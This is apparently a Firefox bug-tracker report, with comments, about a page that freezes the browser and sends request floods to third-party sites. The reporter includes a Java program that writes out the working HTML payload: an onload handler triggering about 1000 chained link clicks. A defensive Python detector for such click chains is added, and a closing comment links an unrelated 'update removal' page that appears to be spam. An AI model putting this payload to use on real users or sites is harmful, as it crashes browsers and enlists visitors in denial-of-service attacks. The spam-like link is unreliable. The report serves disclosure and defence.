Open Bug 1311306 Opened 5 years ago Updated 2 years ago

DDOS target website on Clicking a single link of distributed malicious HTML in Firefox

Categories

(Firefox :: Security, defect, P5)

49 Branch

People

(Reporter: cs.anurag.jain, Unassigned)

References

(Blocks 1 open bug)

Details

(Keywords: csectype-dos, Whiteboard: dupe me)

Attachments

(3 files)

40.50 KB, application/zip
17.19 KB, text/html
9.85 KB, image/png
Attached file firefox.zip
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36

Steps to reproduce:

1) Extract firefox.zip and open a.html
2) Your browser will freeze and in the background your memory usage will keep on increasing.
3) I am using Windows 10; in my case Mozilla's memory increased up to 2.5 GB and Windows terminated Mozilla Firefox.
4) This made the user lose all his data in other tabs. The crash screenshot is in the zip file.

Short summary of attached file:
We created multiple origin points for recursive calls using JavaScript in body onload.
In this we made 1000 origin points, so we made like 1000! calls from a single tab, which froze the entire Firefox and eventually crashed it.
The impact will increase on increasing the origin points.

Creating the payload:
Sample Java Program to create the payload (Copy the output in html file and open the html file to see the exploit):
	public static void linkGenerator()
	{
		System.out.print("<body onload=\"");
		for(int j=0;j<1000;j++){
			System.out.print("document.getElementById('myLink"+j+"').click();");	
		}
		System.out.print("\">");
		System.out.println("\n<a id=\"myLink\" onclick=\"document.getElementById('myLink0').click();\" href=\"http://fb.com\">Click Me</a>");
		for(int i=0;i<1000;i++)
		{
			String html="<a id=\"myLink"+i+"\" onclick=\"document.getElementById('myLink"+(i+1)+"').click();\" href=\"http://twitter.com\"><script></script>Click Me</a>";
			System.out.println(html);
		}
	}


Actual results:

Firefox will crash when a user visits a website with the attached HTML.
In my case (Windows 10) it crashed after Mozilla consumed 2.5 GB of memory.
Not sure how other operating systems would behave when memory keeps on increasing exponentially.


Expected results:

If a tab is consuming too much memory and CPU, then Firefox must either kill it or show a user-friendly message (I see that message on videos or ambiguous JS, but in my case it did not come).
Group: firefox-core-security
Attached file a.html
Just realized we can also use the above loophole to cause DDOS on any third-party website. The attached script will open twitter1...twitter99 on one single user click. The scary part is that the user will not see twitter1..twitter98, so he would never realize that his network is sending several requests to twitter. This attack's intensity would increase as more people click on the link.

The above script will show you twitter5.com last, since I placed a confirm box on twitter4.com's onclick. So an attacker can define the endpoint by simply using an alert or confirm box.

Now, since we can use this to attack other websites, can we consider this a valid security bug?
Summary: Client Browser Denial of Service → DDOS target website on Clicking a single link of distributed malicious HTML in Firefox
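
The structure described in the two comments above (a body onload that clicks many anchors, each anchor's onclick clicking the next, every anchor carrying an external href) can be recognized statically before a page is opened. The following is an added example, not part of the original report or of Firefox's code: it is a triage check that estimates how many script-generated clicks a page would fire on load and which hrefs they point at. The names ClickGraph, clicks_from, analyze, the limit threshold and the target.example URLs are assumptions, and the count is an upper-bound estimate that ignores the browser aborting handlers or navigating away.

```python
import re
from html.parser import HTMLParser

# Pattern from the report: document.getElementById('X').click()
CLICK_RE = re.compile(r"getElementById\(\s*['\"]([^'\"]+)['\"]\s*\)\s*\.click\(\)")

# Constructed sample: a three-link miniature of the structure in the report.
SAMPLE = """<body onload="document.getElementById('l0').click();document.getElementById('l1').click();">
<a id="l0" onclick="document.getElementById('l1').click();" href="http://target.example/a">x</a>
<a id="l1" onclick="document.getElementById('l2').click();" href="http://target.example/b">x</a>
<a id="l2" onclick="document.getElementById('l3').click();" href="http://target.example/b">x</a>"""

class ClickGraph(HTMLParser):
    """Records which element ids each inline handler clicks programmatically."""
    def __init__(self):
        super().__init__()
        self.edges, self.hrefs, self.entry = {}, set(), []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "body":  # clicks fired on load, with no user action
            self.entry += CLICK_RE.findall(a.get("onload") or "")
        if a.get("id"):
            self.edges[a["id"]] = CLICK_RE.findall(a.get("onclick") or "")
            self.hrefs.add(a.get("href"))

def clicks_from(edges, start, memo):
    """Clicks caused by clicking known id `start`; None if the handlers loop."""
    open_nodes, stack = set(), [start]
    while stack:  # iterative DFS: a 1000-link chain must not hit the recursion limit
        node = stack[-1]
        open_nodes.add(node)
        todo = [t for t in edges[node] if t in edges and t not in memo]
        if any(t in open_nodes for t in todo):
            return None  # handler cycle: unbounded click recursion
        if todo:
            stack.extend(todo)
        else:  # ids that do not exist contribute nothing and end the chain
            memo[node] = 1 + sum(memo[t] for t in edges[node] if t in edges)
            open_nodes.discard(node)
            stack.pop()
    return memo[start]

def analyze(html, limit=20):
    g, memo = ClickGraph(), {}
    g.feed(html)
    counts = [clicks_from(g.edges, e, memo) for e in g.entry if e in g.edges]
    total = None if None in counts else sum(counts)
    return {"clicks": total, "targets": sorted(filter(None, g.hrefs)),
            "suspicious": total is None or total > limit}
```

On the constructed sample, the two onload entry points expand to five synthetic clicks across two distinct hrefs; a page shaped like the one in the report grows quadratically with the number of links.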
Attached image memory.png
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0 
Build ID: 20161019084923

Hi Anurag,

I have tested your issue on the latest FF release (49.0.1) and latest Nightly (Build ID: 20161024030205) and reproduced it.
Using the HTML attachment from Firefox.zip, the memory increased up to 4.4 GB (please see attachment); Firefox just froze, without crashing.

At first glance this issue could start in the Security component.
Component: Untriaged → Security
Status: UNCONFIRMED → NEW
Ever confirmed: true
Thanks Roxana for the check :)
The part I am most scared of is becoming a part of a DDOS attack by just clicking on the link as shown in a.html (simply posting a viral post with an infected link on Facebook can initiate a serious chain of attack on the targeted website).
Chrome also has the freeze problem, but somehow it manages to send only one link on the network and cancel the remaining several calls, thus saving the user from becoming a DDOS node. Just a suggestion: it would be great if we could use a similar strategy along with saving victim resources.
Hi,
Any update on this issue?
Thanks
Blocks: eviltraps
Keywords: csectype-dos
Priority: -- → P5
Whiteboard: dupe me
Flags: sec-bounty-
Hi, I have tested this issue on the newest FF release. After the update, from Firefox.zip, the memory increased up to 4.4 GB; Firefox just froze, without crashing. Didn't understand what is going on. Later I found this: https://reviewedbypro.com/what-is-critical-firefox-update-and-how-to-remove-it/ Be careful